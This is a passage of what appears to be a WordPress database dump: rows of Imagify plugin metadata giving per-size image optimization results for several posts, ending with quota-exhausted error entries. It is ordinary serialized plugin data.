'_imagify_optimization_level','2'),(1658,432,'_imagify_status','success'),(1659,432,'_imagify_data','a:2:{s:5:\"sizes\";a:20:{s:4:\"full\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:938570;s:14:\"optimized_size\";i:380802;s:7:\"percent\";d:59.42999999999999971578290569595992565155029296875;}s:43:\"et-pb-image--responsive--phone@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:78167;s:14:\"optimized_size\";i:41916;s:7:\"percent\";d:46.38000000000000255795384873636066913604736328125;}s:44:\"et-pb-image--responsive--tablet@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:266765;s:14:\"optimized_size\";i:140428;s:7:\"percent\";d:47.3599999999999994315658113919198513031005859375;}s:48:\"et-pb-gallery-module-image-portrait@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:91983;s:14:\"optimized_size\";i:47808;s:7:\"percent\";d:48.030000000000001136868377216160297393798828125;}s:41:\"et-pb-portfolio-module-image@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:95047;s:14:\"optimized_size\";i:50032;s:7:\"percent\";d:47.3599999999999994315658113919198513031005859375;}s:34:\"et-pb-portfolio-image@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:61757;s:14:\"optimized_size\";i:31756;s:7:\"percent\";d:48.5799999999999982946974341757595539093017578125;}s:34:\"et-pb-post-main-image@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:56337;s:14:\"optimized_size\";i:28472;s:7:\"percent\";d:49.46000000000000085265128291212022304534912109375;}s:25:\"medium_large@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:174592;s:14:\"optimized_size\";i:93754;s:7:\"percent\";d:46.2999999999999971578290569595992565155029296875;}s:22:\"thumbnail@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:24681;s:14:\"optimized_size\";i:8826;s:7:\"percent\";d:64.2399999999999948840923025272786617279052734375;}s:19:\"medium@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:39902;s:14:\"optimized_size\";i:18316;s:7:\"percent\";d:54.10000000000000142108547152020037174224853515625;}s:17:\"full@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:938570;s:14:\"optimized_size\";i:166074;s:7:\"percent\";d:82.31000000000000227373675443232059478759765625;}s:6:\"medium\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:39902;s:14:\"optimized_size\";i:32557;s:7:\"percent\";d:18.410000000000000142108547152020037174224853515625;}s:9:\"thumbnail\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:24681;s:14:\"optimized_size\";i:22243;s:7:\"percent\";d:9.8800000000000007815970093361102044582366943359375;}s:12:\"medium_large\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:174592;s:14:\"optimized_size\";i:123553;s:7:\"percent\";d:29.230000000000000426325641456060111522674560546875;}s:21:\"et-pb-post-main-image\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:56337;s:14:\"optimized_size\";i:44812;s:7:\"percent\";d:20.46000000000000085265128291212022304534912109375;}s:21:\"et-pb-portfolio-image\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:61757;s:14:\"optimized_size\";i:48746;s:7:\"percent\";d:21.07000000000000028421709430404007434844970703125;}s:28:\"et-pb-portfolio-module-image\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:95047;s:14:\"optimized_size\";i:70780;s:7:\"percent\";d:25.530000000000001136868377216160297393798828125;}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:91983;s:14:\"optimized_size\";i:64641;s:7:\"percent\";d:29.730000000000000426325641456060111522674560546875;}s:31:\"et-pb-image--responsive--tablet\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:266765;s:14:\"optimized_size\";i:172405;s:7:\"percent\";d:35.36999999999999744204615126363933086395263671875;}s:30:\"et-pb-image--responsive--phone\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:78167;s:14:\"optimized_size\";i:59992;s:7:\"percent\";d:23.25;}}s:5:\"stats\";a:3:{s:13:\"original_size\";i:3655602;s:14:\"optimized_size\";i:1647913;s:7:\"percent\";d:54.9200000000000017053025658242404460906982421875;}}'),(1660,427,'_imagify_optimization_level','2'),(1661,427,'_imagify_status','success'),(1662,427,'_imagify_data','a:2:{s:5:\"sizes\";a:20:{s:4:\"full\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:416133;s:14:\"optimized_size\";i:125703;s:7:\"percent\";d:69.7900000000000062527760746888816356658935546875;}s:43:\"et-pb-image--responsive--phone@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:44670;s:14:\"optimized_size\";i:15678;s:7:\"percent\";d:64.900000000000005684341886080801486968994140625;}s:44:\"et-pb-image--responsive--tablet@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:105308;s:14:\"optimized_size\";i:37042;s:7:\"percent\";d:64.8299999999999982946974341757595539093017578125;}s:48:\"et-pb-gallery-module-image-portrait@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:49528;s:14:\"optimized_size\";i:15706;s:7:\"percent\";d:68.2900000000000062527760746888816356658935546875;}s:41:\"et-pb-portfolio-module-image@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:50016;s:14:\"optimized_size\";i:17394;s:7:\"percent\";d:65.219999999999998863131622783839702606201171875;}s:34:\"et-pb-portfolio-image@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:38495;s:14:\"optimized_size\";i:13164;s:7:\"percent\";d:65.7999999999999971578290569595992565155029296875;}s:34:\"et-pb-post-main-image@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:36795;s:14:\"optimized_size\";i:12842;s:7:\"percent\";d:65.099999999999994315658113919198513031005859375;}s:25:\"medium_large@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:76210;s:14:\"optimized_size\";i:27222;s:7:\"percent\";d:64.280000000000001136868377216160297393798828125;}s:22:\"thumbnail@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:22341;s:14:\"optimized_size\";i:6282;s:7:\"percent\";d:71.8799999999999954525264911353588104248046875;}s:19:\"medium@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:29931;s:14:\"optimized_size\";i:9900;s:7:\"percent\";d:66.9200000000000017053025658242404460906982421875;}s:17:\"full@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:416133;s:14:\"optimized_size\";i:41646;s:7:\"percent\";d:89.9899999999999948840923025272786617279052734375;}s:6:\"medium\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:29931;s:14:\"optimized_size\";i:23744;s:7:\"percent\";d:20.6700000000000017053025658242404460906982421875;}s:9:\"thumbnail\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:22341;s:14:\"optimized_size\";i:19774;s:7:\"percent\";d:11.4900000000000002131628207280300557613372802734375;}s:12:\"medium_large\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:76210;s:14:\"optimized_size\";i:42431;s:7:\"percent\";d:44.32000000000000028421709430404007434844970703125;}s:21:\"et-pb-post-main-image\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:36795;s:14:\"optimized_size\";i:26610;s:7:\"percent\";d:27.67999999999999971578290569595992565155029296875;}s:21:\"et-pb-portfolio-image\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:38495;s:14:\"optimized_size\";i:27363;s:7:\"percent\";d:28.9200000000000017053025658242404460906982421875;}s:28:\"et-pb-portfolio-module-image\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:50016;s:14:\"optimized_size\";i:31867;s:7:\"percent\";d:36.28999999999999914734871708787977695465087890625;}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:49528;s:14:\"optimized_size\";i:30552;s:7:\"percent\";d:38.31000000000000227373675443232059478759765625;}s:31:\"et-pb-image--responsive--tablet\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:105308;s:14:\"optimized_size\";i:60952;s:7:\"percent\";d:42.11999999999999744204615126363933086395263671875;}s:30:\"et-pb-image--responsive--phone\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:44670;s:14:\"optimized_size\";i:30100;s:7:\"percent\";d:32.61999999999999744204615126363933086395263671875;}}s:5:\"stats\";a:3:{s:13:\"original_size\";i:1738854;s:14:\"optimized_size\";i:615972;s:7:\"percent\";d:64.5799999999999982946974341757595539093017578125;}}'),(1663,423,'_imagify_optimization_level','2'),(1664,423,'_imagify_status','success'),(1665,423,'_imagify_data','a:2:{s:5:\"sizes\";a:20:{s:4:\"full\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:460922;s:14:\"optimized_size\";i:128155;s:7:\"percent\";d:72.2000000000000028421709430404007434844970703125;}s:43:\"et-pb-image--responsive--phone@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:43845;s:14:\"optimized_size\";i:15374;s:7:\"percent\";d:64.93999999999999772626324556767940521240234375;}s:44:\"et-pb-image--responsive--tablet@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:112695;s:14:\"optimized_size\";i:45672;s:7:\"percent\";d:59.469999999999998863131622783839702606201171875;}s:48:\"et-pb-gallery-module-image-portrait@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:53773;s:14:\"optimized_size\";i:20806;s:7:\"percent\";d:61.31000000000000227373675443232059478759765625;}s:41:\"et-pb-portfolio-module-image@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:51250;s:14:\"optimized_size\";i:18510;s:7:\"percent\";d:63.88000000000000255795384873636066913604736328125;}s:34:\"et-pb-portfolio-image@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:38083;s:14:\"optimized_size\";i:12080;s:7:\"percent\";d:68.280000000000001136868377216160297393798828125;}s:34:\"et-pb-post-main-image@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:35016;s:14:\"optimized_size\";i:10806;s:7:\"percent\";d:69.1400000000000005684341886080801486968994140625;}s:25:\"medium_large@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:79084;s:14:\"optimized_size\";i:31446;s:7:\"percent\";d:60.24000000000000198951966012828052043914794921875;}s:22:\"thumbnail@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:21360;s:14:\"optimized_size\";i:4004;s:7:\"percent\";d:81.25;}s:19:\"medium@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:28205;s:14:\"optimized_size\";i:8012;s:7:\"percent\";d:71.590000000000003410605131648480892181396484375;}s:17:\"full@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:460922;s:14:\"optimized_size\";i:52182;s:7:\"percent\";d:88.68000000000000682121026329696178436279296875;}s:6:\"medium\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:28205;s:14:\"optimized_size\";i:22387;s:7:\"percent\";d:20.629999999999999005240169935859739780426025390625;}s:9:\"thumbnail\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:21360;s:14:\"optimized_size\";i:18916;s:7:\"percent\";d:11.4399999999999995026200849679298698902130126953125;}s:12:\"medium_large\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:79084;s:14:\"optimized_size\";i:44914;s:7:\"percent\";d:43.21000000000000085265128291212022304534912109375;}s:21:\"et-pb-post-main-image\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:35016;s:14:\"optimized_size\";i:25373;s:7:\"percent\";d:27.53999999999999914734871708787977695465087890625;}s:21:\"et-pb-portfolio-image\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:38083;s:14:\"optimized_size\";i:26876;s:7:\"percent\";d:29.42999999999999971578290569595992565155029296875;}s:28:\"et-pb-portfolio-module-image\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:51250;s:14:\"optimized_size\";i:33358;s:7:\"percent\";d:34.909999999999996589394868351519107818603515625;}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:53773;s:14:\"optimized_size\";i:34767;s:7:\"percent\";d:35.340000000000003410605131648480892181396484375;}s:31:\"et-pb-image--responsive--tablet\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:112695;s:14:\"optimized_size\";i:58251;s:7:\"percent\";d:48.31000000000000227373675443232059478759765625;}s:30:\"et-pb-image--responsive--phone\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:43845;s:14:\"optimized_size\";i:29527;s:7:\"percent\";d:32.659999999999996589394868351519107818603515625;}}s:5:\"stats\";a:3:{s:13:\"original_size\";i:1848466;s:14:\"optimized_size\";i:641416;s:7:\"percent\";d:65.2999999999999971578290569595992565155029296875;}}'),(1666,420,'_imagify_optimization_level','2'),(1667,420,'_imagify_status','success'),(1668,420,'_imagify_data','a:2:{s:5:\"sizes\";a:20:{s:4:\"full\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:194602;s:14:\"optimized_size\";i:40541;s:7:\"percent\";d:79.1700000000000017053025658242404460906982421875;}s:43:\"et-pb-image--responsive--phone@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:35097;s:14:\"optimized_size\";i:9848;s:7:\"percent\";d:71.93999999999999772626324556767940521240234375;}s:44:\"et-pb-image--responsive--tablet@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:61520;s:14:\"optimized_size\";i:20704;s:7:\"percent\";d:66.349999999999994315658113919198513031005859375;}s:48:\"et-pb-gallery-module-image-portrait@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:46580;s:14:\"optimized_size\";i:14536;s:7:\"percent\";d:68.7900000000000062527760746888816356658935546875;}s:41:\"et-pb-portfolio-module-image@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:39250;s:14:\"optimized_size\";i:11876;s:7:\"percent\";d:69.7399999999999948840923025272786617279052734375;}s:34:\"et-pb-portfolio-image@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:32851;s:14:\"optimized_size\";i:8922;s:7:\"percent\";d:72.840000000000003410605131648480892181396484375;}s:34:\"et-pb-post-main-image@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:31986;s:14:\"optimized_size\";i:8348;s:7:\"percent\";d:73.900000000000005684341886080801486968994140625;}s:25:\"medium_large@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:49495;s:14:\"optimized_size\";i:15714;s:7:\"percent\";d:68.25;}s:22:\"thumbnail@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:25875;s:14:\"optimized_size\";i:5368;s:7:\"percent\";d:79.25;}s:19:\"medium@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:28376;s:14:\"optimized_size\";i:6904;s:7:\"percent\";d:75.6700000000000017053025658242404460906982421875;}s:17:\"full@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:194602;s:14:\"optimized_size\";i:21780;s:7:\"percent\";d:88.81000000000000227373675443232059478759765625;}s:6:\"medium\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:28376;s:14:\"optimized_size\";i:24333;s:7:\"percent\";d:14.25;}s:9:\"thumbnail\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:25875;s:14:\"optimized_size\";i:24124;s:7:\"percent\";d:6.769999999999999573674358543939888477325439453125;}s:12:\"medium_large\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:49495;s:14:\"optimized_size\";i:30793;s:7:\"percent\";d:37.78999999999999914734871708787977695465087890625;}s:21:\"et-pb-post-main-image\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:31986;s:14:\"optimized_size\";i:25566;s:7:\"percent\";d:20.07000000000000028421709430404007434844970703125;}s:21:\"et-pb-portfolio-image\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:32851;s:14:\"optimized_size\";i:25914;s:7:\"percent\";d:21.120000000000000994759830064140260219573974609375;}s:28:\"et-pb-portfolio-module-image\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:39250;s:14:\"optimized_size\";i:28086;s:7:\"percent\";d:28.440000000000001278976924368180334568023681640625;}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:46580;s:14:\"optimized_size\";i:30876;s:7:\"percent\";d:33.71000000000000085265128291212022304534912109375;}s:31:\"et-pb-image--responsive--tablet\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:61520;s:14:\"optimized_size\";i:34480;s:7:\"percent\";d:43.9500000000000028421709430404007434844970703125;}s:30:\"et-pb-image--responsive--phone\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:35097;s:14:\"optimized_size\";i:26694;s:7:\"percent\";d:23.940000000000001278976924368180334568023681640625;}}s:5:\"stats\";a:3:{s:13:\"original_size\";i:1091264;s:14:\"optimized_size\";i:415407;s:7:\"percent\";d:61.92999999999999971578290569595992565155029296875;}}'),(1669,337,'_imagify_optimization_level','2'),(1670,337,'_imagify_status','success'),(1671,337,'_imagify_data','a:2:{s:5:\"sizes\";a:34:{s:4:\"full\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:199883;s:14:\"optimized_size\";i:75786;s:7:\"percent\";d:62.0799999999999982946974341757595539093017578125;}s:43:\"et-pb-image--responsive--phone@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:36456;s:14:\"optimized_size\";i:13354;s:7:\"percent\";d:63.36999999999999744204615126363933086395263671875;}s:44:\"et-pb-image--responsive--tablet@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:67080;s:14:\"optimized_size\";i:24794;s:7:\"percent\";d:63.03999999999999914734871708787977695465087890625;}s:45:\"et-pb-image--responsive--desktop@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:86902;s:14:\"optimized_size\";i:32348;s:7:\"percent\";d:62.780000000000001136868377216160297393798828125;}s:50:\"et-pb-post-main-image-fullwidth-large@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:187127;s:14:\"optimized_size\";i:61226;s:7:\"percent\";d:67.280000000000001136868377216160297393798828125;}s:48:\"et-pb-gallery-module-image-portrait@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:36563;s:14:\"optimized_size\";i:12832;s:7:\"percent\";d:64.900000000000005684341886080801486968994140625;}s:41:\"et-pb-portfolio-image-single@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:73010;s:14:\"optimized_size\";i:27266;s:7:\"percent\";d:62.64999999999999857891452847979962825775146484375;}s:41:\"et-pb-portfolio-module-image@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:36203;s:14:\"optimized_size\";i:12752;s:7:\"percent\";d:64.780000000000001136868377216160297393798828125;}s:34:\"et-pb-portfolio-image@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:29933;s:14:\"optimized_size\";i:10370;s:7:\"percent\";d:65.3599999999999994315658113919198513031005859375;}s:44:\"et-pb-post-main-image-fullwidth@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:60541;s:14:\"optimized_size\";i:20976;s:7:\"percent\";d:65.349999999999994315658113919198513031005859375;}s:34:\"et-pb-post-main-image@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:28677;s:14:\"optimized_size\";i:9620;s:7:\"percent\";d:66.4500000000000028421709430404007434844970703125;}s:22:\"2048x2048@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:149775;s:14:\"optimized_size\";i:53588;s:7:\"percent\";d:64.219999999999998863131622783839702606201171875;}s:22:\"1536x1536@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:106782;s:14:\"optimized_size\";i:39782;s:7:\"percent\";d:62.74000000000000198951966012828052043914794921875;}s:25:\"medium_large@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:53021;s:14:\"optimized_size\";i:19572;s:7:\"percent\";d:63.090000000000003410605131648480892181396484375;}s:22:\"thumbnail@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:20145;s:14:\"optimized_size\";i:6080;s:7:\"percent\";d:69.81999999999999317878973670303821563720703125;}s:18:\"large@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:69727;s:14:\"optimized_size\";i:25138;s:7:\"percent\";d:63.9500000000000028421709430404007434844970703125;}s:19:\"medium@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:26902;s:14:\"optimized_size\";i:9208;s:7:\"percent\";d:65.7699999999999960209606797434389591217041015625;}s:17:\"full@imagify-webp\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:207171;s:14:\"optimized_size\";i:69614;s:7:\"percent\";d:66.400000000000005684341886080801486968994140625;}s:6:\"medium\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:26902;s:14:\"optimized_size\";i:19180;s:7:\"percent\";d:28.699999999999999289457264239899814128875732421875;}s:5:\"large\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:69727;s:14:\"optimized_size\";i:33887;s:7:\"percent\";d:51.39999999999999857891452847979962825775146484375;}s:9:\"thumbnail\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:20145;s:14:\"optimized_size\";i:17579;s:7:\"percent\";d:12.7400000000000002131628207280300557613372802734375;}s:12:\"medium_large\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:53021;s:14:\"optimized_size\";i:28097;s:7:\"percent\";d:47.00999999999999801048033987171947956085205078125;}s:9:\"1536x1536\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:106782;s:14:\"optimized_size\";i:46270;s:7:\"percent\";d:56.6700000000000017053025658242404460906982421875;}s:9:\"2048x2048\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:149775;s:14:\"optimized_size\";i:60040;s:7:\"percent\";d:59.909999999999996589394868351519107818603515625;}s:21:\"et-pb-post-main-image\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:28677;s:14:\"optimized_size\";i:19939;s:7:\"percent\";d:30.469999999999998863131622783839702606201171875;}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:60541;s:14:\"optimized_size\";i:31309;s:7:\"percent\";d:48.280000000000001136868377216160297393798828125;}s:21:\"et-pb-portfolio-image\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:29933;s:14:\"optimized_size\";i:20249;s:7:\"percent\";d:32.35000000000000142108547152020037174224853515625;}s:28:\"et-pb-portfolio-module-image\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:36203;s:14:\"optimized_size\";i:22576;s:7:\"percent\";d:37.6400000000000005684341886080801486968994140625;}s:28:\"et-pb-portfolio-image-single\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:73010;s:14:\"optimized_size\";i:34743;s:7:\"percent\";d:52.409999999999996589394868351519107818603515625;}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:36563;s:14:\"optimized_size\";i:22743;s:7:\"percent\";d:37.7999999999999971578290569595992565155029296875;}s:37:\"et-pb-post-main-image-fullwidth-large\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:187127;s:14:\"optimized_size\";i:71680;s:7:\"percent\";d:61.68999999999999772626324556767940521240234375;}s:32:\"et-pb-image--responsive--desktop\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:86902;s:14:\"optimized_size\";i:39730;s:7:\"percent\";d:54.280000000000001136868377216160297393798828125;}s:31:\"et-pb-image--responsive--tablet\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:67080;s:14:\"optimized_size\";i:32842;s:7:\"percent\";d:51.03999999999999914734871708787977695465087890625;}s:30:\"et-pb-image--responsive--phone\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:36456;s:14:\"optimized_size\";i:22261;s:7:\"percent\";d:38.93999999999999772626324556767940521240234375;}}s:5:\"stats\";a:3:{s:13:\"original_size\";i:2544742;s:14:\"optimized_size\";i:1047431;s:7:\"percent\";d:58.840000000000003410605131648480892181396484375;}}'),(1672,305,'_imagify_optimization_level','2'),(1673,305,'_imagify_status','success'),(1674,305,'_imagify_data','a:2:{s:5:\"sizes\";a:20:{s:4:\"full\";a:4:{s:7:\"success\";b:1;s:13:\"original_size\";i:528943;s:14:\"optimized_size\";i:200825;s:7:\"percent\";d:62.030000000000001136868377216160297393798828125;}s:43:\"et-pb-image--responsive--phone@imagify-webp\";a:2:{s:7:\"success\";b:0;s:5:\"error\";s:75:\"You\'ve consumed all your data. You have to upgrade your account to continue\";}s:44:\"et-pb-image--responsive--tablet@imagify-webp\";a:2:{s:7:\"success\";b:0;s:5:\"error\";s:75:\"You\'ve consumed all your data. You have to upgrade your account to continue\";}s:48:\"et-pb-gallery-module-image-portrait@imagify-webp\";a:2:{s:7:\"success\";b:0;s:5:\"error\";s:85:\"Our server returned an error (402 - transfer closed with 115 bytes remaining to read)\";}s:41:\"et-pb-portfolio-module-image@imagify-webp\";a:2:{s:7:\"success\";b:0;s:5:\"error\";s:75:\"You\'ve consumed all your data. You have to upgrade your account to continue\";}s:34:\"et-pb-portfolio-image@imagify-webp\";a:2:{s:7:\"success\";b:0;s:5:\"error\";s:75:\"You\'ve consumed all your data. You have to upgrade your account to continue\";}s:34:\"et-pb-post-main-image@imagify-webp\";a:2:{s:7:\"success\";b:0;s:5:\"error\";s:75:\"You\'ve consumed all your data. You have to upgrade your account to continue\";}s:25:\"medium_large@imagify-webp\";a:2:{s:7:\"success\";b:0;s:5:\"error\";s:75:\"You\'ve consumed all your data. You have to upgrade your account to continue\";}s:22:\"thumbnail@imagify-webp\";a:2:{s:7:\"success\";b:0;s:5:\"error\";s:75:\"You\'ve consumed all your data. You have to upgrade your account to continue\";}s:19:\"medium@imagify-webp\";a:2:{s:7:\"success\";b:0;s:5:\"error\";s:75:\"You\'ve consumed all your data. You have to upgrade your account to continue\";}s:17:\"full@imagify-webp\";a:2:{s:7:\"success\";b:0;s:5:\"error\";s:75:\"You\'ve consumed all your data. You have to upgrade your account to continue\";}s:6:\"medium\";a:2:{s:7:\"success\";b:0;s:5:\"error\";s:75:\"You\'ve consumed all your data. You have to upgrade your account to continue\";}s:9:\"thumbnail\";a:2:{s:7:\"success\";b:0;s:5:\"error\";s:75:\"You\'ve consumed all your data. You have to upgrade your account to continue\";}s:12:\"medium_large\";a:2:{s:7:\"success\";b:0;s:5:\"error\";s:75:\"You\'ve consumed all your data. You have to upgrade your account to continue\";}s:21:\"et-pb-post-main-image\";a:2:{s:7:\"success\";b:0;s:5:\"error\";s:75:\"You\'ve consumed all your data. You have to upgrade your account to continue\";}s:21:\"et-pb-portfolio-image\";a:2:{s:7:\"success\";b:0;s:5:\"error\";s:75:\"You\'ve consumed all your data. You have to upgrade your account to continue\";}s:28:\"et-pb-portfolio-module-image\";a:2:{s:7:\"success\";b:0;s:5:\"error\";s:75:\"You\'ve consumed all your data. You have to upgrade your account to continue\";}s:35:\"et-pb-gallery-module-image-portrait\";a:2:{s:7:\"success\";b:0;s:5:\"error\";s:75:\"You\'ve consumed all your data. You have to upgrade your account to continue\";}s:31:\"et-pb-image--responsive--tablet\";a:2:{s:7:\"success\";b:0;s:5:\"error\";s:75:\"You\'ve consumed all your data. You have to upgrade your account to continue\";}s:30:\"et-pb-image--responsive--phone\";a:2:{s:7:\"success\";b:0;s:5:\"error\";s:75:\"You\'ve consumed all your data. You have to upgrade your account to continue\";}}s:5:\"stats\";a:3:{s:13:\"original_size\";i:528943;s:14:\"optimized_size\";i:200825;s:7:\"percent\";d:62.030000000000001136868377216160297393798828125;}}'),(1675,304,'_imagify_optimization_level','2'),(1676,304,'_imagify_status','error'),(1677,304,'_imagify_data','a:2:{s:5:\"sizes\";a:1:{s:4:\"full\";a:2:{s:7:\"success\";b:0;s:5:\"error\";s:75:\"You\'ve consumed all your data. You have to upgrade your account to continue\";}}s:5:\"stats\";a:3:{s:13:\"original_size\";i:0;s:14:\"optimized_size\";i:0;s:7:\"percent\";i:0;}}'),(1678,303,'_imagify_optimization_level','2'),(1679,303,'_imagify_status','error'),(1680,303,'_imagify_data','a:2:{s:5:\"sizes\";a:1:{s:4:\"full\";a:2:{s:7:\"success\";b:0;s:5:\"error\";s:75:\"You\'ve consumed all your data. You have to upgrade your account to continue\";}}s:5:\"stats\";a:3:{s:13:\"original_size\";i:0;s:14:\"optimized_size\";i:0;s:7:\"percent\";i:0;}}'),(1681,302,'_imagify_optimization_level','2'),(1682,302,'_imagify_status','error'),(1683,302,'_imagify_data','a:2:{s:5:\"sizes\";a:1:{s:4:\"full\";a:2:{s:7:\"success\";b:0;s:5:\"error\";s:75:\"You\'ve consumed all your data. You have to upgrade your account to 